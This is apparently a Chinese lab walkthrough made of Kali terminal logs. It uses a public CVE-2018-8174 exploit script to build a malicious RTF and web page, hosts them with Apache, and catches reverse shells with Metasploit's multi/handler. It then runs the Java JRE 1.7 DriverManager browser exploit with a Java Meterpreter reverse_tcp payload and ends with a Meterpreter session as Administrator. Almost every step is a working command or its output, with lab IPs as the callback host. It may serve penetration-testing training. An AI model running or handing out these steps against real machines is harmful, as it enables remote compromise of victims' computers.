
git clone https://github.com/iBearcat/CVE-2018-8174_EXP.git┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# unzip CVE-2018-8174_EXP-master.zip
Archive: CVE-2018-8174_EXP-master.zip
d055e4d56920f10303f9a8879c8eb47e22abb01d
creating: CVE-2018-8174_EXP-master/
inflating: CVE-2018-8174_EXP-master/CVE-2018-8174.py
inflating: CVE-2018-8174_EXP-master/README.md ┌──(root㉿kali-2024)-[/home/ljs/Desktop/CVE-2018-8174_EXP-master]
└─# ls
CVE-2018-8174.py README.md┌──(root㉿kali-2024)-[/home/ljs/Desktop/CVE-2018-8174_EXP-master]
└─# python2 CVE-2018-8174.py -u http://192.168.234.141/exploit.html -o hack.rtf -i 192.168.234.141 -p 4444
UNICODE_URL len 138 , need to pad ...
Generated hack.rtf successfully
!!! Completed !!!参数详解说明:


┌──(root㉿kali-2024)-[/home/ljs/Desktop/CVE-2018-8174_EXP-master]
└─# cp exploit.html /var/www/html/┌──(root㉿kali-2024)-[/home/ljs/Desktop/CVE-2018-8174_EXP-master]
└─# service apache2 start 
msf6 exploit(multi/handler) > back
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.234.141
LHOST => 192.168.234.141
msf6 exploit(multi/handler) > exploithttp://192.168.234.141/exploit.html





安装过程,一直点击下一步即可
msf6 exploit(multi/handler) > use exploit/multi/browser/java_jre17_driver_manager
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/browser/java_jre17_driver_manager) > show options
Module options (exploit/multi/browser/java_jre17_driver_manager):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This m
ust be an address on the local machine or 0.0.0.0 to lis
ten on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly ge
nerated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.79.135 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
View the full module info with the info, or info -d command.
msf6 exploit(multi/browser/java_jre17_driver_manager) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_aws_instance_connect normal No Unix SSH Shell, Bind Instance Connect (via AWS API)
1 payload/generic/custom normal No Custom Payload
2 payload/generic/shell_bind_aws_ssm normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact normal No Interact with Established SSH Connection
6 payload/java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline
7 payload/java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline
8 payload/java/meterpreter/bind_tcp normal No Java Meterpreter, Java Bind TCP Stager
9 payload/java/meterpreter/reverse_http normal No Java Meterpreter, Java Reverse HTTP Stager
10 payload/java/meterpreter/reverse_https normal No Java Meterpreter, Java Reverse HTTPS Stager
11 payload/java/meterpreter/reverse_tcp normal No Java Meterpreter, Java Reverse TCP Stager
12 payload/java/shell/bind_tcp normal No Command Shell, Java Bind TCP Stager
13 payload/java/shell/reverse_tcp normal No Command Shell, Java Reverse TCP Stager
14 payload/java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline
15 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
16 payload/multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
msf6 exploit(multi/browser/java_jre17_driver_manager) > java/meterpreter/reverse_tcpInterrupt: use the 'exit' command to quit
msf6 exploit(multi/browser/java_jre17_driver_manager) > set paylod java/meterpreter/reverse_tcp
[!] Unknown datastore option: paylod. Did you mean PAYLOAD?
paylod => java/meterpreter/reverse_tcp
msf6 exploit(multi/browser/java_jre17_driver_manager) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/browser/java_jre17_driver_manager) > set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 exploit(multi/browser/java_jre17_driver_manager) > jobs -K
Stopping all jobs...
msf6 exploit(multi/browser/java_jre17_driver_manager) > run
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# lsof -i:4444
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
ruby 179670 root 8u IPv4 425867 0t0 TCP *:4444 (LISTEN)
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# kill -9 179670




msf6 exploit(multi/browser/java_jre17_driver_manager) > sessions -i 6
meterpreter > getuid
Server username: Administrator